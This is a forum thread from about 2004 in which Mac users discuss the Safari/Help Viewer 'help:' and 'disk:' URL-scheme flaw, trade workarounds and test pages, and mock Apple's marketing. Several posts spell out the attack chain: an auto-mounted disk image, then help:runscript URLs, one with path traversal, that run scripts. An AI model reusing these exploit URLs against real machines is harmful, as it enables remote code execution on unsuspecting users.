Useless as it doesn't stop disk:// links being automounted.

correct me if im wrong but it doesnt matter what opens "disk://" because in the end, when it tries to get the "help:" helper it'll stop it in it's tracks - because the vulnerability is w/ what opens 'help:' not 'disk:'

Is it really a vulnerability if the OS is just doing what it was designed and intended to do??? No. This is merely someone exploiting the way the operating system works. The real vulnerability with this is STUPID USERS. :rolleyes:

Nope. It's still a flaw. There's a flaw in the design. In any case, exploitation of this only requires visiting a website. It's difficult to verify the trustworthiness of a website without visiting it, so there's no need to be stupid to be affected by this. There's plenty of cases where the problem is the user not using common sense, but this is not one of them.

Automatic Remote Application Execution = Flaw.

I disagree. If you aren't aware of proper surfing practices, don't surf.

And you've actually been reading this thread, have you? The only "proper surfing" you could practice would be to not surf at all. I'm beginning to think that some people would think it was fine if all a PC was capable of doing safely was burning up electricity and expelling warm air. "Hey, it works great, so long as you don't turn it on!"

So when will Apple be putting the fix into Software Update? Should we start a pool? Within one week? Two? Three? A month?

correct me if im wrong but it doesnt matter what opens "disk://" because in the end, when it tries to get the "help:" helper it'll stop it in it's tracks - because the vulnerability is w/ what opens 'help:' not 'disk:'

You are correct in that help:// is needed to be accessed, however turning off "safe" attachments will not stop help opening, as it's not an attachment.

The dangerous part is the disk:// image automount, as it will contain the payload, as right now arguments cannot be passed to shell commands launched via the built in AppleScript exploit.

The disk:// launching is the "dangerous" part - if it didn't do that then it would not be so bad.

If a Virus/Trojan has to be spread through Mail, using the Adress Book It wouldn't hit a big population of Mac Users, just for me would be unusuable, from my adress book I only have one "Mac Friend" the rest are Windows'ers and an applescript file would have no sense, worst a *.dmg file, I think that this whole thread of Mac Trojan/Virus comes from any Antivirus/Firewall Company or maybe from some Pro-MS-Place to create a bad atmosphere before WWDC, nevertheless, it's really neccesary tpo address this kind of issues within our OS, it's has been never a Virus/Trojan, it doesn't come to us, we have to go to it before it can operate, double-clicking or opening a homepage, but spread through an E-mail app would give less than 5% the infection efficiency expected from the writer...
I agree that the amount of Mac users out there is most definitely a factor, which works in our favour at the moment as haxx0rs don't really have much to gain - it would probably fizzle out.

Now imagine if the latest version of NetSky turns up with this Mac exploit included along with a PC exploit in the same email. Not exactly difficult.

Instant multi platform virus. :(

LS didn't alert me of anything when I used Address Book. Maybe you were using a feature that needed to make a connection somewhere. :confused:

Ok Addressbook connects to

homepage.mac.com on port 80

when you launch it. Still it's a bit scary and definatly unwelcome to some folks.

So when will Apple be putting the fix into Software Update? Should we start a pool? Within one week? Two? Three? A month?


I uh told Apple about it several months ago when it first appeared on slashdot.

Thought they fixed it long ago.

All apple need to do is change safari slightly so that when a disk image is downloaded a message box asks if the user wants to mount it or not. a simple yes/no with a warning that if you dont know what it is then don't open it.

You are correct in that help:// is needed to be accessed, however turning off "safe" attachments will not stop help opening, as it's not an attachment.

The dangerous part is the disk:// image automount, as it will contain the payload, as right now arguments cannot be passed to shell commands launched via the built in AppleScript exploit.

The disk:// launching is the "dangerous" part - if it didn't do that then it would not be so bad.

Okay, so for the idiots out there (like me, I confess), I need to change the helper app for not just the "help" protocol but also the "disk" protocol to something like Chess? I used the More Internet pref pane and changed the help protocol, but I didn't have a disk protocol listed, so I added one merely titled "disk" (I would have tried disk:// format but More Internet wouldn't allow colons). Is this correct?

Now the safe example opens Chess, but of course it's only testing the help protocol, if I understand correctly. Can someone make a safe example of the exploit that uses the disk protocol so I can test it too?

FWIW, this is how this thing works:

A user is directed to a page that does two things: (1) Downloads a disk image to the user's computer which will hopefully be automounted, and (2) redirects the page to the URL "help:runscript=MacHelp.help/Contents/Resources/English.lproj/shrd/OpnApp.scpt" with the argument "string='Volumes:0x04_script:0x04_script.term'"

What this does is instructs the Help Viewer application to send the «event helphdhp» AppleEvent to a script file located at a path relative to /Library/Documentation/Help/. If the script file does not respond to this Apple Event, nothing will happen. You cannot use this method to directly execute non-compiled applescript, binary executables, or applescript which is inline with the URL. You have to find a script which responds to «event helphdhp». I imagine that there are not a whole lot of these scripts save for the two bundled with the Help Viewer application itself: OpnApp.scpt and opnbndsig.scpt.

I tried renaming the scripts to see if that would do anything, and the exploit seems to be prevented (both the webpage link and the .dmg versions). My question, though, is what do OpnApp.scpt and opnbndsig.scpt do that would be important to Help Viewer, such that I would not want to rename them, and I should instead try one of the other solutions, such as changing permissions?

I tried renaming the scripts to see if that would do anything, and the exploit seems to be prevented (both the webpage link and the .dmg versions). My question, though, is what do OpnApp.scpt and opnbndsig.scpt do that would be important to Help Viewer, such that I would not want to rename them, and I should instead try one of the other solutions, such as changing permissions?

They are used by help to open files as part of the help. For instance the take me to the blah blah preference or the go to blah blah website.

http://users.adelphia.net/~lively/fixbug.dmg has a script that replaces the current versions (its in more than one help file) with one that

1) won't launch an application (there is another script for that so that shouldn't be an issue)
2) won't open something off of a mounted volume, probably a good saftey measure.
3) asks before anything is opened.

Its not ready for localized versions of the help files.

Changing OpnApp.scpt wont help !

The fixes from MongoTheGeek and Isophonic (iostream.h) are NOT ENOUGH !

Try http://bronosky.com/pub/AppleScript.htm - this isn't a complete exploit, but coupled with the disk: protocol it is. (Edit: to be more precise: Try this link "help:runscript=../../Scripts/Info%20Scripts/Current%20Date%20&%20Time.scpt")


The ONLY good fix is to map the "help:" protocol to start something other than HelpViewer. - Note that this apparently won't affect the help system in any way ! (do this with Internet Explorer -> Settings -> Network -> Protocol Helpers)

It would be really easy for Apple to issue a quick fix that just changed the "help:" protocol (or somehow removed it). I guess they aren't in any hurry since noone has exploited this in a bad way...yet.

The ONLY good fix is to map the "help:" protocol to start something other than HelpViewer. - Note that this apparently won't affect the help system in any way ! (do this with Internet Explorer -> Settings -> Network -> Protocol Helpers)

It will break some ways of getting to the help system.

It will break some ways of getting to the help system.

Ok, I haven't noticed. Could you please be more specific ?

Well, starting help from a website comes to mind, but who does that anyway ? :)

Changing OpnApp.scpt wont help !

(Edit: to be more precise: try this link (help:runscript=../../Scripts/Info%20Scripts/Current%20Date%20&%20Time.scpt))
Maybe I'm doing something wrong. When I click that link absolutly nothing happens, guess I'm safe eh?

Maybe I'm doing something wrong. When I click that link absolutly nothing happens, guess I'm safe eh?

Sorry, remove the "http://" :-/

Everyday someone trys to find some way to say somthing bad about the Mac OS. The last update have fixed this problem and i dont think that there should be anything to worry about, such as worms and viruses. I dont think you have anything to worry about. Microsoft put out XP and a minute later there come thoese security updates. I just have to say im happy that i dont have to deal with another computer that has to use windows updates. All i have to say is the next best thing to the MAC OS is open sorce.


Bobby The Gibbons
crazybobby.com

When I try it that way, Help Viewer launches and that's it. The script itself doesn't run. Seems DGTGF does it's job well.

All apple need to do is change safari slightly so that when a disk image is downloaded a message box asks if the user wants to mount it or not. a simple yes/no with a warning that if you dont know what it is then don't open it.

Or along with the auto-open safe attachments preference. There could be an auto-mount disk images feature (which when turned off Safari or the Finder would prompt you if you really want to mount the image).

Unfortunately (downloading and executing a script from a .dmg file is bad enough) this vulnerability doesn't need to download a .dmg file first to gain access...

Check this out: http://bronosky.com/pub/AppleScript.htm

When I try it that way, Help Viewer launches and that's it. The script itself doesn't run. Seems DGTGF does it's job well.

Ok, I give up.

Here is a real example (http://ozwix.dk/OpnAppFixer/testit.html) - although in steps so you can see what happens. Of course totally harmless, and nothing will happen before you click a link from the linked page.

The disk image actually was stolen from lixlpixel - the person who discovered this security hole initially.

It seems Windows had the same problem - but Microsoft got it fixed before Apple !

http://www.cnn.com/2004/TECH/internet/05/12/microsoft.flaw.warning.reut/index.html

:)

Ok, I give up.

Here is a real example (http://ozwix.dk/OpnAppFixer/testit.html) - although in steps so you can see what happens. Of course totally harmless, and nothing will happen before you click a link from the linked page.

The disk image actually was stolen from lixlpixel - the person who discovered this security hole initially.

Alright, those still worked. Hey, I wasn't trying to argue with you I just wanted to test the limits of the 'fix' that I had applied. Seems it wasn't good enough. I changed the help URI and now it seems I'm safe even from those.
Thanks.

Alright, those still worked. Hey, I wasn't trying to argue with you [..]

I'm sorry. I'm just frustrated on isophonic.net because I have written them twice, and they still make people believe that they are secured by their fix when they are not... :mad:

Unsanity released a free fix (Paranoid Android) for this vulnerability as well as another which has been reported to Apple but is not yet public.

From their website (http://www.unsanity.com/haxies/pa/):

"Paranoid Android can protect you from this potential vulnerability until Apple makes an official fix available. It does this by watching the URL schemes that are requested and delaying them until you've had a chance to say whether you'd like to proceed or not. If you know that the url that's being loaded is legit, go ahead, but if it looks suspicious, Paranoid Android gives you an opportunity to cancel it."

Includes an uninstaller with the installer.

Came across a fix on this site (http://www.macintouch.com/newsrecent.shtml#i.2004.05.18.secunia) that seems quite good.


Other readers offered workarounds for the problem:
...
[Tracy Valleau] Here's a quick, and harmless (read; reversible) fix for the help autolaunch vulnerability:

First, make a Backup copy of /Library/Documentation/Help/MacHelp.help.
Next do a show contents on the original, and
find:Contents/Resources/English.lproj/shrd/OpnApp.scpt
Make the change as shown below (adding the two dashes in front of "open file completeParam of the startup disk" (This comments out that line of code, so it won't run.)


on «event helphdhp» (completeParam)
-- localizable text
set cancelBtn to "Cancel"
set errorText to "The item cannot be opened. It may be disabled or not installed."
--end localizable text
try
tell application "Finder"
-- open file completeParam of the startup disk
end tell
on error errMsg number errNum
display dialog errorText buttons {cancelBtn} default button 1 with icon 0
return
end try
end «event helphdhp»


save the file.
Remove all your foreign language versions of the same help file (at the Resources level)
After doing this, the help file will still run, but will not be able to "open xyz for me"
* Later on, you can replace your patched copy with the backup copy of MacHelp.help you made in step one, and apply Apple's (forthcoming) fix to it. Meanwhile, you'll be safe from that exploit.


It was quite handy, as I deleted all the other languages that help has available, thus reducing the file to about 1/8 of the original size... :)

Came across a fix on this site (http://www.macintouch.com/newsrecent.shtml#i.2004.05.18.secunia) that seems quite good.

It's not enough. Try this link (http://ozwix.dk/OpnAppFixer/testit.html) to test how secure you is(n't)...

It's not enough. Try this link (http://ozwix.dk/OpnAppFixer/testit.html) to test how secure you is(n't)...

Hmm... not good...

Edit: Well I'm protected now, but at the cost that Help Viewer cannot longer execute...

As root in terminal (su):
root# chmod 400 /System/Library/CoreServices/Help\ Viewer.app
This command makes Help Viewer read-only (cannot be changed or executed).

Edit2: Ok, I give up... Paranoid Andriod installed... :rolleyes:

The mis-fox solution works ok for this particular script, but am I right in thinking that help is not the only app that can be told to run a script?

Edit: post deleted. Only fix now is to install the Paranoid Android or disable auto-open _and_ disable "disk:"...

Right, well I haven't read the thread or done a search but I'm a little bit tired of reading about this. Instead I shall point you all to a MacNN Forums post (http://forums.macnn.com/showthread.php?s=&threadid=213043&perpage=50&pagenumber=6#post1995710) covering the full extent of this security hole and tell you that Paranoid Android is currently the only way to be completely safe.

Someone mentioned earlier that the flaw isn't public, well I think being posted on a BB is pretty public. I think we should be telling as many people as possible rather than trying to keep a lid on it, that way Apple might get a fix out. Oh yeah, and e-mailing Apple repeatedly is probably a good idea.

Sorry if my tone is a little short....

biscuit

Some semi good news. Acourding to MacSlash the latest build of 10.3.4 beta is immune to at-least one of the exploits out there. :) the question I have is do you need to upgrade to 10.3.4 from 10.3.3 to fix or will Apple update all 10.3.x. systems? I know their will be a security fix for 10.2.x because Apple will not upgrade every on to 10.3 to fix the problem. But will they force an upgrade on all 10.3 users to 10.3.4?
the link to the MacSlash story MacSlash (http://macslash.org/article.pl?sid=04/05/20/1711258&mode=thread)

the question I have is do you need to upgrade to 10.3.4 from 10.3.3 to fix or will Apple update all 10.3.x. systems?

usually there are two different upgrade packages: one for updating the previous latest system (10.3.3) and a "combo update" for updating any 10.3.x system. naturally the combo install package is larger in file size.

No disrespect intended, but I just read this thread and, quite honestly, as a long-time Mac user, the whole discussion of this problem and OSX/Safari security & exploits is both unfortunate and sadly comical. Whether you view OSX as a 5% marketshare OS, or in its larger context among other *nix derivatives, it's really time that OSX users woke up to the fact that claims about OSX security are a bunch of hooey.

OSX and its applications are no better or worse than any other piece of software as far as security goes, including Windows and other *nix flavors, and the "post hoc Apple propter hoc" logic just doesn't work. Just because there haven't been many serious breaches doesn't mean you're safe. In comparison, Windows variants have obviously had their problems, but also run 90+% of the world's personal computers and are constant targets. From that standpoint, you could possibly argue that Windows is actually safer.

Oh look! Someone left a note:
Dear Mac Users All Over The World,

You're all safe all the time if you use OSX and Safari, since they are absolutely secure and bullet-proof, unlike Windows, which the whole world knows is an unsafe, buggy piece of crap. Oh, and because the majority of the world doesn't care about or look for OSX security problems due to our tiny marketshare, you're even safer! In fact, that's why we chose endangered, inbred cats that mostly live in game preserves and zoos to advertise our software. Meow.

Love, Steve

ps. I left some Apple-shaped cookies and milk near your mouse for when you get home from Computer Kindergarten and I even took a bite out of each one, just the way you like it. Oh, and there are some Little Friskies for kitty.

If anybody needs to re-order any of the following, there's still time before inventory runs out:
- Apple SpinFlakes - mmmm - great for breakfast
- Rose-Colored Apple Sunglasses
- Brainwashing Sleep Tapes
- A Freshly-Pressed Sheep Suit

There is no such thing as a secure OS, which is the fundamental rationale for things like external firewalls. OS security, and that of contained software such as Safari, is a relative concept, and I am eagerly awaiting the next campaign from the Apple Spin Machine once the world realizes that OSX is not really as safe as Apple claims.

I guess as long as this thread is partially about comedy...
-----------------------------------------------------
Recent Apple Spin Doctor Brain-Storming Session On Software Security:
"Uh oh...the Safari script kiddies got us...now what do we say about Safari & OSX, since the world obviously knows that they're not as safe as we say???"
"Well, it's just some scripts. Cut and run! No wait! We can just change the OS & browser codenames to make it look like we're doing something. We'll lose the cats and start using ultra-tough, military names!"
"We could also include a bunch of little plastic army men in the box to give the impression of high security! We'll tell everyone they're safe from Viruses of Mass Destruction."
"Yeah - and we can even write our own virus as proof of VMDs!"
"Will Steve be head of MacLand Security? AUGHH! He's going to fire us!"
"Shut up, you idiot!"
"Hmmm...Viruses of Mass Destruction...maybe we could finally appeal to conservative Republicans and dupe the Europeans to increase sales."
"That is so dumb. Plastic is bad for the environment!"
"But it's good for Republicans."
"And Europeans!"
"OSXI: Screaming Eagle!"
"...featuring 'Talon,', the 8th generation web browser!"
"What was the 7th generation?"
"Who cares?"
"Can we make the screen bleed with cool 3D effects?"
"This is better: 'In 1984, Apple invented the Macintosh. In 2004, they've reinvented the pixel.' Ha ha."
"That's never going to work! First the benchmark fiascos, and now this! AUGGHH! We're doomed! Steve's going to fire us!!"
[everyone else in unison] "SHUT UP, you idiot!!"
"OK...well...how about this? 'OSX - it's safe-ER."
"It's the SAFIEST! Errr..Safeway!! Sorry - I'm hungry - pass the Krispy Kremes..."
"No wait! We're on to something! 'As a cutting-edge, visionary OS developer, sometimes you have to break the security mold and trade safety for more features.'"
"That totally works for the press release!"
"Yeah! That's it! We give you more features!"
"And plastic army men!"
"And pixels!"
"Are more features better or worse for the environment than plastic?"
"OK - wait - I've got it. 'Less safe, More features!'"
"No...'less' is no good - too negative - we need a more spinny word that implies no culpability on our part for the obvious, gaping OS and software security holes that we don't want anyone to know about! Well...unless someone leaks them so that we have to acknowledge they exist."
"Hang on! I'VE GOT IT!! 'Tastes safe. More features!'"
"Taste is good. People like to eat...well maybe not crow. HEY! why didn't that @%@$#@!! admin get more Krispy Kremes? I sent the memo last week!!"
"Ugh! Contractors! Let's redesign their badge color and make them wear funny hats."
"C'mon - get back on task. We can torture the part-time peons later!"
"Taste has great spin! Can we trademark it??"
"Wait - how about this: 'Think Disk Doctor!'"
"Hey! That's good for a Norton co-marketing campaign - awesome - we'll stick it to them with a buy-in deal and also charge users for security upgrades! heh heh!"
"Sweet!"
"Tastes safe...but is it? Ha ha!"
"We can include a little army medic guy and field ambulance with a real siren in special ultra-secure theme bundles!"
"Cool! We can even resurrect the old tank ad!"
"Yeah - let's overlay a camouflage-colored iPod on the General!"
"Hey yeah! And he needs a red LED like the Terminator! 'I vill protect you, MacOS. I am de Mac-inator.' Ha ha!"
"Can he dance hip hop and grimace threateningly at the same time?"
"Sure. By the time we're done with him, he'll be running for office!"
"These are all good ideas, but we need more user subjugation."
"How about a privacy-invading, mail-in insert in every box for a free leather mousepad and a verbally abusive screen saver module?"
"We could make users say 'baaaa-a-a-aaa' while clicking our new limited liability 'super secure OS' user agreement!"
"Get legal on the phone."
[...brief conversation with Legal while more Krispy Kremes vanish from the box...]
"Sorry - they say we can't use a sheep sound because Apple Records will sue us again due to the obvious, musical nature of animal noises, and especially sheep."
"Even if we call it 'soshearmi?'"
"OK...forget the sheep noise...how about 'Who's Your Daddy?!'"
"Yeah! We could use the voice recognition software to make sure they said it while clicking the 'I agree' button!"
"What if they mess up?"
"They have to keep saying it until they get it right."
"PERFECT!"
"I like it! It really feeds the dysfunctional sense of attachment and self-destructive, myopic fanaticism of our core users!"
"Wait! I've got it - TALKING miniature army men with FIREWIRE PORTS! [deep army voice] 'Stand back, cyber-citizens, this is a secure, area.' Ha ha!"
"We could have a TV show about anthropomorphic software modules defending the country against Internet invaders and call it 'Cat Patrol!'"
"What are the firewire ports for?"
"DUH! Higher chip volumes to drive down the cost of CPU hardware! How else are we going to make money? How long have you been working here, anyway?"
"We're going to need more Krispy Kremes..."
"Someone get Mattel on the phone..."

Among all the posts in this thread, one of the most interesting is the one by MorganX showing the basic disparity between reality and the Apple Spin Machine (http://forums.macrumors.com/showpost.php?p=846607&postcount=50). Security holes have obviously been an ongoing issue. And, for those of you who said "I shouldn't have said anything! Now the virus hackers are going to find us. Ahhh!! flag-waving, mutant script kiddies from Mars! blah, blah, blah..." you're kidding, RIGHT? :rolleyes:

Besides the myth that OSX is secure, what Apple has also done a good job of spinning is the notion that, somehow, after the Apple Pope of Software Integration has blessed the code with the Holy Sheen of Aqua User Interface, APIs, and Hardware Abstraction Layers, OSX is just one piece of software.

That's a very good trick, considering it contains a myriad of software components/libraries/applications that are part of the core unix distribution (+ many add-ons) that have little to do with Apple and have all of the same security vulnerabilities shared by every other unix distribution using similar code. Apple didn't write it and can only assess the vulnerabilities of the huge codebase based on relatively limited in-house testing, the squealing of a world full of guinea pig testers desperately relying on the integrity of the OS, and the *nix community of developers and users which constantly finds new security issues in the distribution code. But, because it's Apple, flaws which exist in the same distribution everywhere else in the world magically don't exist in OSX and MacLand, right? La, la, laaaa... *fingers in ears.*

The sobering thing about the current Safari security issue is that it seems to be in code that Apple actually wrote. So, if they can't find serious flaws like this in their own code with in-house engineering and testing, what happens with code they didn't write? You could argue that it doesn't make a difference, but theoretically, if you're writing and testing the code yourself, you should be able to have an optimal result. And...where's the quick fix or the official security bulletin?

The Talking Moose desk accessory just leapt out of the graveyard and asked Apple "Hey - Why aren't you doing anything?" Part of the comedy is that the user community has actually fixed the problem before Apple has even admitted to it.

OS foundations aside, the Mac OS in all its incarnations has ALWAYS been susceptible to viruses (nVIR, for example). But, for the current OS, even if there are BSD vulnerabilities, you're still safe from the Windows script kiddies, because they're too dumb to figure out the esoterica of a new OS to create a plague of annoyances, right? Wrong. The *nix userbase is huge, and to make matters worse, the *nix users are actually the smart, usually academic ones, who can certainly figure out how to cause much more trouble than the average script kiddie. Luckily, it's the academic and open source communities, among others, that actually help Apple by constantly increasing the robustness of the underlying distribution code.

So, the question is not *if* there will be a serious Mac security issue, but *when* the next of many will occur. OSX is not a bastion against hacking, and the best thing Apple could do is set standard, realistic OS security expectations for its users and respond to real problems quickly, rather than spin a web of supposed imperviousness, superiority, concealment, and inaction. Beyond that, as others have repeatedly pointed out, it's up to users of any OS to be responsible in the use of the Internet and any other resources external (or introduced) to a particular host computer.

There are dumb things you can do on every OS. But, hang tough, the talking, plastic, firewire port army men are coming to protect you, and they will keep you safe from VMD's. ;)

If only they could save users and large computer manufacturers from themselves...but for that, there's "CAT PATROL!" Tune in next week for an exciting new episode where Panther gets a flea dip! :)

There is a helpviewer update in Software update.
I just downloaded it and it works like Unsanity's fix by asking you if you want to accept a scheme. Personal, I liked Unsanity's better because if gave you a description of what it was blocking.
So I guess, Apple does read these boards.

There is a helpviewer update in Software update.
I just downloaded it and it works like Unsanity's fix by asking you if you want to accept a scheme. Personal, I liked Unsanity's better because if gave you a description of what it was blocking.
So I guess, Apple does read these boards.

On my machine it just seems to ignore help:runscript. It starts HelpViewer, but the "runscript=" part is seemingly ignored.

Which URL did you use to test with ?

Edit: the developer says:
that's Paranoid Android presenting its dialog, but since you'd disabled it, it can't find the localized versions of its strings and icon. Once it's loaded into a running process (Safari), it stays loaded. You have to quit and relaunch Safari to unload Paranoid Android.

Quarkie-

Apple released the patch today - nice rant, though. :rolleyes:

Yes - it's great that they posted the patch...and also about time.

I'm hoping to turn the marketing meeting script above into a major independent film.

And it actually was a pretty fun rant. :p

Does panther need a flea dip? Definitely.

Hey Rower -

Look! They fixed the problem! (http://apple.slashdot.org/article.pl?sid=04/05/22/1441233&mode=thread&tid=126&tid=172&tid=179&tid=185&tid=190)

*whistling noises*

Quite honestly, it's hard not to laugh (or cry) at Apple's ludicrous software security claims. Maybe you'd like to reconsider your previous sarcasm. ;)

...or maybe you'd like to...

Think Disk Doctor!

:D